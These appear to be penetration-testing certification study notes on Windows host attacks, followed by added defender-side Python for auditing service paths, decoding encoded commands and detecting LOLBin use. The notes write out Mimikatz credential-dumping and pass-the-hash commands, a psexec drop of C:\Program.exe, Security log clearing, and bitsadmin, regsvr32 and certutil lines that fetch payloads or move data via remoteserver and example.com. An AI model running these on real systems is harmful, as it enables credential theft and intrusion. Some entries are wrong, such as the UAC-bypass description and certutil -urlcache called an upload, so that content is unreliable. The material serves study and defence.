Section 19: Host Attacks

Host Attacks

  • Host attacks involve methods to wreak havoc on systems.

  • Important for penetration testing as they offer the quickest way to spread malware.

  • Strategies are derived from viruses found in nature.

  • Centered around domain four, attacks and exploits.

  • Objective 4.4 is the main focus: perform post-exploitation attacks using appropriate tools given a scenario.

Privilege Escalation

  • Techniques and tools to gain higher-level access on a system or network.

  • Common methods: exploiting system vulnerabilities or configuration oversights.

  • Hands-on demonstration using Metasploit for practical application.

Credential Harvesting

  • Methods and tools to gather user credentials secretly.

  • Tools covered: Mimikatz and Rubeus.

Misconfigured Endpoints

  • Identifying and exploiting common security misconfigurations using tools like PowerShell.

  • Endpoints can be soft targets for initial access or lateral movement.

Unquoted Service Paths

  • Specific Windows misconfiguration that allows attackers to gain higher privileges if services are improperly configured.

Disabling Security Software

  • Techniques to disable or circumvent antivirus and other security applications to maintain persistence or avoid detection.

Payload Obfuscation

  • Methods to make malware less detectable by security software through encryption, encoding, or other means.

User Account Control (UAC) Bypass

  • Methods and tools to exploit web applications, manipulating input fields or search parameters to bypass client-side controls.

Shell and Kiosk Escape

  • How hackers can break out of restricted environments provided by shells and kiosk mode applications.

  • Techniques like DLL injection or process hollowing using tools like PSExec to run malicious code within legitimate processes.

Log Tampering

  • How attackers can alter or delete logs to hide their activity and maintain presence on compromised hosts.

Living Off The Land (LOTL)

  • Using the system's own features or legitimate software to conduct malicious activity, making detection harder.

Privilege Escalation in Detail

  • Privilege escalation: gaining higher-level permissions than originally intended.

  • Allows access to sensitive data or restricted actions.

  • Exploits inherent trust and misconfigurations of operating systems and applications.

  • Techniques include exploiting vulnerabilities, misconfigurations, and weak passwords.

  • Types: vertical (user to admin) and horizontal (peer-level accounts).

Mimikatz
  • Post-exploitation tool for extracting plaintext passwords, hashes, and Kerberos tickets from memory.

  • Effective on Windows systems.

  • Extracts credentials from memory to escalate privileges or move laterally.

  • Example scenario: gaining admin access from a low-level user account.

Mimikatz Commands
  • Extracting logon passwords:
    mimikatz # sekurlsa::logonpasswords

    • sekurlsa refers to the Windows component handling security credentials.

    • logonpasswords specifies the action of extracting logon passwords.

  • Dumping hashes from the SAM file:
    mimikatz # lsadump::sam

    • lsadump refers to dumping information from the Local Security Authority.

    • sam refers to the Security Accounts Manager database.

  • Performing a pass-the-hash attack:
    mimikatz # sekurlsa::pth /user:administrator /domain:example.com /ntlm:[NTLM hash] /run:cmd.exe

    • pth indicates the pass-the-hash attack.

    • /user:administrator specifies the target user account.

    • /domain:example.com identifies the Active Directory domain.

    • /ntlm:[NTLM hash] provides the NTLM hash of the administrator's password.

    • /run:cmd.exe launches a command prompt with elevated privileges.

Seatbelt
  • C# tool for security-related checks on Windows systems.

  • Automates finding misconfigurations and weak spots for privilege escalation.

  • Example scenario: assessing a client's network security posture.

Seatbelt Commands
  • Enumerate all checks:
    seatbelt.exe all

  • Check for high-integrity processes:
    seatbelt.exe -group=checks_elevated

  • List autorun executables:
    seatbelt.exe autoruns

PowerShell Integrated Scripting Environment (ISE)
  • Graphical user interface for script creation, testing, and debugging in PowerShell.

  • Used for various host-based attacks.

  • Automates tasks like extracting system information, running exploitation modules, or creating backdoors.

  • Example scenario: gathering detailed host information for privilege escalation.

Practical Applications
  • Mimikatz: extracting credentials and performing pass-the-hash attacks.

  • Seatbelt: automating the detection of system misconfigurations.

  • PowerShell ISE: providing a user-friendly environment for scripting and executing host-based attacks.

Credential Harvesting and Dumping

  • Credential harvesting: collecting user credentials through phishing or social engineering.

  • Credential dumping: extracting credentials from a compromised system post-exploitation.

  • Scenario: Penetration test for a financial institution.

    • Exploiting a known vulnerability (CVE-2021-34527) to gain server access.

Mimikatz for Credential Dumping
  • Dumping credentials from the Local Security Authority Subsystem Service (LSASS) process.

  • Commands:
    mimikatz # privilege::debug
    mimikatz # sekurlsa::logonpasswords

  • Results: usernames, plaintext passwords, or NTLM hashes.

Rubeus for Kerberos Ticket Manipulation
  • Used for pass-the-ticket attacks.

  • Renewing a Ticket Granting Ticket (TGT).

  • Command example:
    Rubeus.exe tgt::renew /user:admin /domain:banksecure.local /sid:[SID]

    • Rubeus.exe: executable name for the tool.

    • tgt::renew: specifies renewing a ticket granting ticket (TGT).

    • /user:admin: specifies the username for which the TGT is renewed.

    • /domain:banksecure.local: specifies the Active Directory domain.

    • /sid:[SID]: specifies the security identifier of the user account.

  • Allows impersonating users and accessing network resources.

Post-Exploitation Actions
  • Accessing sensitive financial data, modifying transactions, or creating admin accounts.

  • Importance of robust security practices: patching, network segmentation, and multi-factor authentication.

Misconfigured Endpoints Explained

  • Endpoints: devices connecting to a network (computers, servers, mobile devices).

  • Misconfigured endpoints: weak passwords, unnecessary services, open ports.

  • Scenario: Pen test on a corporate network, gaining access to a standard user's workstation.

Exploiting PowerShell
  • PowerShell: powerful scripting language for task automation and configuration.

  • Exploitation: using PowerShell if workstation security policies are not strictly enforced.

  • Example: Running a service with system privileges that executes scripts from an insecure directory.

Lateral Movement with PSExec
  • PSExec: tool from the Sysinternals suite to execute commands on remote systems.

  • Exploitation: using PSExec to move laterally if remote command execution is allowed without proper controls.

  • Scenario: gaining elevated privileges and accessing other machines using stored credentials.

  • Real-world scenario: gaining access to a file server through PSExec and executing a malicious payload.

Unquoted Service Paths Explained

  • Unquoted service paths: misconfiguration in how Windows services are defined.

  • Vulnerability: Windows may incorrectly interpret the service path if it contains spaces and is not enclosed in quotation marks.

  • Example: C:\Program Files\My Service\Service.exe

Detecting Unquoted Service Paths using PowerShell
  • Using PowerShell to check service paths for spaces without quotes.

  • Example script:
    # Win32_Service exposes PathName on every PowerShell version; Get-Service only
    # gained BinaryPathName in newer releases, so this form also works on Windows PowerShell 5.1.
    Get-CimInstance Win32_Service |
      Where-Object { $_.StartMode -eq 'Auto' } |
      ForEach-Object {
        # A path that contains a space and does not begin with a quote is unquoted
        if ($_.PathName -notlike '"*' -and $_.PathName -like '* *') {
          Write-Host "Unquoted Service Path Found: $($_.Name) - $($_.PathName)"
        }
      }

  • Detecting the vulnerability in a Finance Tracker service.
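A defender-side audit of the same check, added here as an example and not part of the original notes: it reproduces how Windows resolves an unquoted path (the first location probed is C:\Program.exe, as in the scenario that follows) so that each candidate location can be checked for write access and the path quoted. The service list and the FinanceTracker entry are constructed stand-ins for Get-CimInstance Win32_Service output.

```python
# Constructed sample of what Get-CimInstance Win32_Service returns (Name, PathName).
# "FinanceTracker" is a hypothetical stand-in for the notes' Finance Tracker service.
SAMPLE_SERVICES = [
    {"Name": "FinanceTracker", "PathName": r"C:\Program Files\Finance Tracker\tracker.exe"},
    {"Name": "Dhcp", "PathName": r"C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted"},
    {"Name": "GoodApp", "PathName": r'"C:\Program Files\Good App\good.exe" -service'},
]


def unquoted_path_hijack_points(path_name):
    """Return (vulnerable, hijack_points) for a service's PathName.

    Mirrors how Windows resolves an unquoted path that contains spaces: it
    tries each space-delimited prefix in turn, appending ".exe" when the
    prefix has no extension, until a file exists. Every location probed
    before the real executable is a hijack point a defender must check for
    write access. Assumption: the first token ending in ".exe" is the real
    binary; anything after it is treated as service arguments.
    """
    path = path_name.strip()
    if not path or path.startswith('"'):
        return False, []          # quoted paths are resolved unambiguously
    parts = path.split(" ")
    probed = []
    for i in range(1, len(parts) + 1):
        prefix = " ".join(parts[:i])
        if prefix.lower().endswith(".exe"):
            probed.append(prefix)
            break
        probed.append(prefix + ".exe")
    hijack_points = probed[:-1]   # last entry is the genuine executable
    return bool(hijack_points), hijack_points


def audit_services(services):
    """Map service name -> hijack points for every service with an unquoted path."""
    findings = {}
    for svc in services:
        vulnerable, points = unquoted_path_hijack_points(svc["PathName"])
        if vulnerable:
            findings[svc["Name"]] = points
    return findings


if __name__ == "__main__":
    for name, points in audit_services(SAMPLE_SERVICES).items():
        print(f"{name}: unquoted path, Windows would probe {points} first")
```

For each hijack point, the directory it sits in (C:\ and C:\Program Files\ in the sample) is what to check for write permissions by non-administrators.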

Exploiting Unquoted Service Paths using PSExec
  • Placing a malicious executable in the root of the C drive.

  • Command:
    psexec \\financesecurecorp -u brokerageaccount -p password cmd /c echo [Malicious Code] > C:\Program.exe

  • When the service starts, Windows resolves the unquoted path to C:\Program.exe first and runs it with the service's elevated privileges.

Disabling Security Controls

  • Tools: PowerShell and PSExec.

  • PowerShell: scripting language and command-line shell for task automation.

  • PSExec: tool to execute processes on remote systems.

Payload Obfuscation Explained

  • Payload obfuscation: disguising malicious payloads to avoid detection.

  • Goal: make the payload less recognizable without changing functionality.

  • Methods: encoding, encryption, compression, and code manipulation.

  • PowerShell can be used to obfuscate payloads.

PowerShell for Payload Obfuscation
  • Encoding with Base64:
    $payload = '[Malicious PowerShell Script]'
    $bytes = [System.Text.Encoding]::Unicode.GetBytes($payload)
    $encodedPayload = [Convert]::ToBase64String($bytes)

PSExec for Obfuscated Payload Delivery
  • Executing obfuscated PowerShell scripts on remote machines.

  • Command:
    psexec \\remotecomputer -s powershell.exe -encodedcommand [Base64 Encoded Payload]

Evil WinRM for Obfuscated Payload Delivery
  • Connecting to a remote Windows computer via WinRM.

  • Command:
    evil-winrm -i remotecomputer -u username -p password -s powershell -encodedcommand [Base64 Encoded Payload]
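An added example, not from the original notes, showing the defender's side of the Base64 encoding step and the -encodedcommand deliveries above: decoding an encoded-command argument found in a process command line, as an analyst does when reviewing Event ID 4688 or Sysmon process-creation logs. The command lines are constructed and the embedded script is the notes' own Get-Process one-liner.

```python
import base64


def encode_for_powershell(script):
    """The encoding step from the notes (UTF-16LE bytes, then Base64), used here
    only to build the constructed sample log lines below."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline):
    """Return the decoded script if cmdline carries a PowerShell -EncodedCommand
    argument, else None.

    PowerShell accepts any unambiguous prefix of the switch (-e, -ec, -enc,
    -EncodedCommand, case-insensitive), so the switch is matched by prefix
    rather than by one fixed spelling.
    """
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        if not tok.startswith("-"):
            continue
        name = tok.lstrip("-").lower()
        if name and "encodedcommand".startswith(name):
            try:
                raw = base64.b64decode(tokens[i + 1], validate=True)
                return raw.decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                return None   # the switch was there but the payload is not valid
    return None


# Constructed process command lines (as seen in Event ID 4688 or Sysmon Event 1).
# The embedded script is the notes' own Get-Process one-liner, nothing hostile.
SAMPLE_SCRIPT = "Get-Process | Out-File processes.txt"
SAMPLE_CMDLINES = [
    "powershell.exe -NoProfile -ExecutionPolicy Bypass -enc " + encode_for_powershell(SAMPLE_SCRIPT),
    r"psexec \\remotecomputer -s powershell.exe -encodedcommand " + encode_for_powershell(SAMPLE_SCRIPT),
    "powershell.exe -Command Get-Process",
]


def triage(cmdlines):
    """Map line index -> decoded script for every line that carries an encoded command."""
    hits = {}
    for idx, line in enumerate(cmdlines):
        decoded = decode_encoded_command(line)
        if decoded is not None:
            hits[idx] = decoded
    return hits


if __name__ == "__main__":
    for idx, script in triage(SAMPLE_CMDLINES).items():
        print(f"line {idx}: encoded command decodes to: {script}")
```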

Targeting Active Directory Environments

  • Tools: Certify, Rubeus, and Evil WinRM.

AD Certificate Forgery with Certify
  • ADCS: manages certificates for authentication, encryption, and other security functions.

  • Certify: used to exploit misconfigured certificate templates.

  • Scenario: large enterprise network relying on ADCS.

  • Exploitation: requesting a certificate for a high-privilege service account.

Kerberos Manipulation with Rubeus
  • Kerberos: primary authentication protocol used by AD.

  • Rubeus: interacts with Kerberos tickets.

  • Techniques: Pass-the-ticket attack, creating golden tickets.

Creating a Golden Ticket with Rubeus
  • Forging a TGT using the KRBTGT account hash.

  • Impersonating anyone in the domain, including domain admins.

Post Exploitation with Evil WinRM
  • Remote management using PowerShell remotely.

  • Pivoting within the network after obtaining credentials.

Shell Escape and Kiosk Escape

  • Shell escape: breaking out of restricted shell environments.

  • Kiosk escape: bypassing restrictions on public or kiosk systems.

Shell Escape Techniques
  • Exploiting a command that permits executing other programs.

  • Using a text editor (vi or nano) to spawn a shell.

  • PowerShell escape: using the Invoke-Expression commandlet.

  • Command Example:
    Invoke-Expression -Command 'cmd.exe'

Kiosk Escape Techniques
  • Exploiting vulnerabilities in allowed web browser applications.

  • Using the Save As dialogue to access the file system.

  • Downloading/uploading a PowerShell script.

Library and Process Injection

  • Library and process injection: executing code within the address space of another process.

  • Employed to evade detection, escalate privileges, or bypass security controls.

Injection techniques:

  • DLL Injection: loading a dynamic link library into the memory space of a target process.

  • Process Hollowing: spawning a new process in a suspended state, replacing its memory with malicious code, and then resuming the process.

  • Reflective DLL Injection: loading a DLL directly from memory without writing it to disk.

  • Remote Thread Injection: creating a new thread in a remote process and pointing it to a memory location that contains the malicious code.

EternalBlue

  • Exploit that allows remote code execution with SYSTEM-level access.

  • Combining EternalBlue with process injection techniques to gain access on the target system.

Log Tampering

  • Log tampering: modifying or deleting log files to cover the tracks of an attacker.

  • Logs capture various events such as user credentials, file access, configuration changes, and network connections.

Techniques
  • Deleting specific log entries.

  • Modifying timestamps.

  • Altering log data to create false records.

Using PowerShell for Log Tampering
  • Interacting with Windows event logs.

  • Clearing or manipulating logs with sufficient permissions.

  • Command:
    Clear-EventLog -LogName Security

Using PSExec for Log Tampering
  • Running PowerShell scripts or other commands on remote machines.

  • Command:
    psexec \\remotecomputer -s powershell.exe -command "Clear-EventLog -LogName Security"

Living Off The Land (LOTL) Explained

  • Living Off The Land Binaries (LoLBins): legitimate pre-installed tools and utilities.

  • Used to perform actions without external malware.

  • Avoids detection by security tools as the binaries are trusted.

Common LOLBins
  • Gathering information with PowerShell:
    Get-Process | Out-File processes.txt

  • External file transfer with bitsadmin:
    bitsadmin /transfer jobname /download /priority normal http://remoteserver/payload.exe C:\Windows\Temp\payload.exe

  • Code execution with regsvr32, executing a remote scriptlet:
    regsvr32 /s /n /u /i:http://remoteserver/script.sct scrobj.dll

  • Scheduled task creation with schtasks /create, scheduling a task to run a malicious executable:
    schtasks /create /tn MaliciousTask /tr C:\Windows\Temp\payload.exe /sc onlogon /ru SYSTEM

  • Data exfiltration with certutil:
    Encode sensitive information:
    certutil -encode in.txt out.b64
    Upload it to a remote server:
    certutil -urlcache -split -f http://example.com/out.b64 C:\Windows\Temp\exfil.txt
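An added detection example, not part of the original notes, covering both the log-clearing command (Using PSExec for Log Tampering) and the LOLBin commands above: simple command-line rules run over constructed process-creation log lines, with routine certutil and schtasks uses included to show they do not fire.

```python
import re

# Detection rules built from the commands in the notes: (name, regex) pairs
# matched case-insensitively against a full process command line.
RULES = [
    ("bitsadmin_download",
     re.compile(r"\bbitsadmin(?:\.exe)?\b.*/transfer\b.*https?://", re.I)),
    ("regsvr32_remote_scriptlet",
     re.compile(r"\bregsvr32(?:\.exe)?\b.*/i:https?://.*\bscrobj\.dll\b", re.I)),
    ("schtasks_system_task",
     re.compile(r"\bschtasks(?:\.exe)?\b.*/create\b.*/ru\s+system\b", re.I)),
    ("certutil_encode",
     re.compile(r"\bcertutil(?:\.exe)?\b.*\s-encode\b", re.I)),
    ("certutil_urlcache",
     re.compile(r"\bcertutil(?:\.exe)?\b.*\s-urlcache\b.*https?://", re.I)),
    ("security_log_cleared",
     re.compile(r"\bClear-EventLog\b.*-LogName\s+\W?Security\b", re.I)),
]

# Constructed process-creation log lines; the first six are the notes' own
# commands, the last two are routine uses that must not trigger a rule.
SAMPLE_CMDLINES = [
    r"bitsadmin /transfer jobname /download /priority normal http://remoteserver/payload.exe C:\Windows\Temp\payload.exe",
    r"regsvr32 /s /n /u /i:http://remoteserver/script.sct scrobj.dll",
    r"schtasks /create /tn MaliciousTask /tr C:\Windows\Temp\payload.exe /sc onlogon /ru SYSTEM",
    r"certutil -encode in.txt out.b64",
    r"certutil -urlcache -split -f http://example.com/out.b64 C:\Windows\Temp\exfil.txt",
    r'psexec \\remotecomputer -s powershell.exe -command "Clear-EventLog -LogName Security"',
    r"certutil -hashfile C:\Windows\Temp\setup.exe SHA256",
    r"schtasks /query /tn NightlyBackup",
]


def match_rules(cmdline):
    """Names of every rule that fires on one command line."""
    return [name for name, rx in RULES if rx.search(cmdline)]


def triage(cmdlines):
    """Map line index -> fired rule names, omitting lines with no match."""
    hits = {}
    for idx, line in enumerate(cmdlines):
        fired = match_rules(line)
        if fired:
            hits[idx] = fired
    return hits


if __name__ == "__main__":
    for idx, fired in triage(SAMPLE_CMDLINES).items():
        print(f"line {idx}: {', '.join(fired)}")
```

A cleared Security log also leaves Event ID 1102 in the log itself, so the command-line rule and that event are complementary signals.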